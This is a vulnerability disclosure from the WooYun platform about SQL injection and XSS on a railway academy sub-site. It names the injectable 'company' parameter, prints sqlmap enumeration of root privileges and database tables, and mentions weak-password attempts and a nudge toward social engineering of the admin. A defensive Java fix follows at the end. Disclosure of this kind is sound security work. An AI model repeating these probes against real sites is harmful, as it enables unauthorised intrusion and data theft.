
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2015-0133297

Title: Over 300 vulnerabilities on a sub-site of the China Academy of Railway Sciences (铁科院) (SQL/XSS)

Vendor: China Academy of Railway Sciences (铁科院)

Author: 尊-折戟

Submitted: 2015-08-11 12:11

Fixed: 2015-09-27 09:34

Published: 2015-09-27 09:34

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 15

Status: Vendor confirmed

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-08-11: Details sent to the vendor, awaiting vendor handling
2015-08-13: Vendor confirmed; details disclosed to the vendor only
2015-08-23: Details disclosed to core white hats and domain experts
2015-09-02: Details disclosed to regular white hats
2015-09-12: Details disclosed to intern white hats
2015-09-27: Details disclosed to the public

Brief description:

First time I've seen a site with this many vulnerabilities! Still, China's railway security deserves more attention!

Details:

Stumbled across it by accident.
URL:

http://www.qts-railway.com.cn

Ran a quick scan and found:

SQL and XSS vulnerabilities (reflected and stored), this many; would I make that up?
And how long has this site gone without maintenance! It should count as fairly important, too.
Enough talk, let's continue....
Let's start with the SQL..
Pick any injection point:

http://qts.rails.cn/rqts/infor.jsp?company=1

The company parameter is injectable. Other parameters are injectable as well, but there are too many, so I'm listing just this one as an example!
From this point, let's look at the administrator privileges and the database information..

web application technology: JSP
back-end DBMS: MySQL 5.0
database management system users privileges:
[*] ''@'localhost' [1]:
privilege: USAGE
[*] ''@'localhost.localdomain' [1]:
privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'192.168.100.99' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost.localdomain' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE


administrator privileges; quite a lot of operations allowed!
7 databases:

List the tables:

[09:44:58] [INFO] retrieved: "txrec","txrec_branch_a"
[09:44:59] [INFO] retrieved: "txrec","txrec_branch_b"
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: jeecms_2013_sp1
[74 tables]
+----------------------------------------------+
| jc_acquisition |
| jc_acquisition_history |
| jc_acquisition_temp |
| jc_advertising |
| jc_advertising_attr |
| jc_advertising_space |
| jc_channel |
| jc_channel_attr |
| jc_channel_department |
| jc_channel_ext |
| jc_channel_txt |
| jc_channel_user |
| jc_chnl_group_contri |
| jc_chnl_group_view |
| jc_comment |
| jc_comment_ext |
| jc_config |
| jc_config_attr |
| jc_content |
| jc_content_attachment |
| jc_content_attr |
| jc_content_channel |
| jc_content_check |
| jc_content_count |
| jc_content_ext |
| jc_content_group_view |
| jc_content_picture |
| jc_content_share_check |
| jc_content_tag |
| jc_content_topic |
| jc_content_txt |
| jc_content_type |
| jc_contenttag |
| jc_department |
| jc_file |
| jc_friendlink |
| jc_friendlink_ctg |
| jc_group |
| jc_guestbook |
| jc_guestbook_ctg |
| jc_guestbook_ctg_department |
| jc_guestbook_ext |
| jc_infor |
| jc_keyword |
| jc_log |
| jc_message |
| jc_model |
| jc_model_item |
| jc_receiver_message |
| jc_role |
| jc_role_permission |
| jc_sensitivity |
| jc_site |
| jc_site_attr |
| jc_site_cfg |
| jc_site_flow |
| jc_site_model |
| jc_site_txt |
| jc_topic |
| jc_user |
| jc_user_collection |
| jc_user_department |
| jc_user_ext |
| jc_user_role |
| jc_user_site |
| jc_vote_item |
| jc_vote_record |
| jc_vote_topic |
| jo_authentication |
| jo_config |
| jo_ftp |
| jo_template |
| jo_upload |
| jo_user |
+----------------------------------------------+
Database: jeecms_2012_sp1
[74 tables]
+----------------------------------------------+
| jc_acquisition |
| jc_acquisition_history |
| jc_acquisition_temp |
| jc_advertising |
| jc_advertising_attr |
| jc_advertising_space |
| jc_channel |
| jc_channel_attr |
| jc_channel_department |
| jc_channel_ext |
| jc_channel_txt |
| jc_channel_user |
| jc_chnl_group_contri |
| jc_chnl_group_view |
| jc_comment |
| jc_comment_ext |
| jc_config |
| jc_config_attr |
| jc_content |
| jc_content_attachment |
| jc_content_attr |
| jc_content_channel |
| jc_content_check |
| jc_content_count |
| jc_content_ext |
| jc_content_group_view |
| jc_content_picture |
| jc_content_share_check |
| jc_content_tag |
| jc_content_topic |
| jc_content_txt |
| jc_content_type |
| jc_contenttag |
| jc_department |
| jc_file |
| jc_friendlink |
| jc_friendlink_ctg |
| jc_group |
| jc_guestbook |
| jc_guestbook_ctg |
| jc_guestbook_ctg_department |
| jc_guestbook_ext |
| jc_infor |
| jc_keyword |
| jc_log |
| jc_message |
| jc_model |
| jc_model_item |
| jc_receiver_message |
| jc_role |
| jc_role_permission |
| jc_sensitivity |
| jc_site |
| jc_site_attr |
| jc_site_cfg |
| jc_site_flow |
| jc_site_model |
| jc_site_txt |
| jc_topic |
| jc_user |
| jc_user_collection |
| jc_user_department |
| jc_user_ext |
| jc_user_role |
| jc_user_site |
| jc_vote_item |
| jc_vote_record |
| jc_vote_topic |
| jo_authentication |
| jo_config |
| jo_ftp |
| jo_template |
| jo_upload |
| jo_user |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: txrec
[3 tables]
+----------------------------------------------+
| txrec |
| txrec_branch_a |
| txrec_branch_b |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+


I'll look through the current database:

Got the administrator information:

Got the email address, but no password; anyone good at social engineering can give it a shot!

Proof of vulnerability:

Part two: XSS
The admin backend has XSS
Backend URL:

http://www.qts-railway.com.cn/admin/login.do

XSS in the username field.
I'm listing just one; there are others..
Since I had only obtained the username for the backend, I tried weak passwords but couldn't log in, so I didn't go any further!
Hoping for a higher rank!

Fix recommendation:

You surely have more experience than I do!
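As an added example, not code from the report or from the site, here is a hardened version of the two handlers the report describes: the company parameter of infor.jsp bound through a PreparedStatement instead of concatenated into the query, and the login page's username encoded for the HTML context before it is echoed. The table, column and method names are assumptions; the report shows neither the original query nor the page source.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

public class HardenedHandlers {

    // Vulnerable pattern the report implies for infor.jsp?company=1:
    //   "SELECT ... WHERE company_id = " + request.getParameter("company")
    // The raw value becomes part of the SQL text, so the client controls the query.

    // Hardened: validate the type, then bind the value; it never touches the SQL text.
    // Table/column names are assumptions. The connection should also belong to an
    // account with only the SELECT rights this page needs, not the root account
    // (with FILE, SUPER, etc.) that the report's sqlmap output shows.
    public static List<String> findInfoByCompany(Connection conn, String companyParam)
            throws SQLException {
        int companyId;
        try {
            companyId = Integer.parseInt(companyParam); // reject non-numeric input outright
        } catch (NumberFormatException e) {
            return new ArrayList<>();
        }
        String sql = "SELECT title FROM infor WHERE company_id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, companyId);
            try (ResultSet rs = ps.executeQuery()) {
                List<String> titles = new ArrayList<>();
                while (rs.next()) titles.add(rs.getString("title"));
                return titles;
            }
        }
    }

    // Hardened: admin/login.do echoes the submitted username back into the page.
    // Encode it for an HTML text/attribute context so markup is rendered literally.
    public static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }
}
```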

Copyright notice: when reposting, please credit the source 尊-折戟@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-08-13 09:32

Vendor reply:

Confirmed and being fixed, thank you!

Latest status:

None yet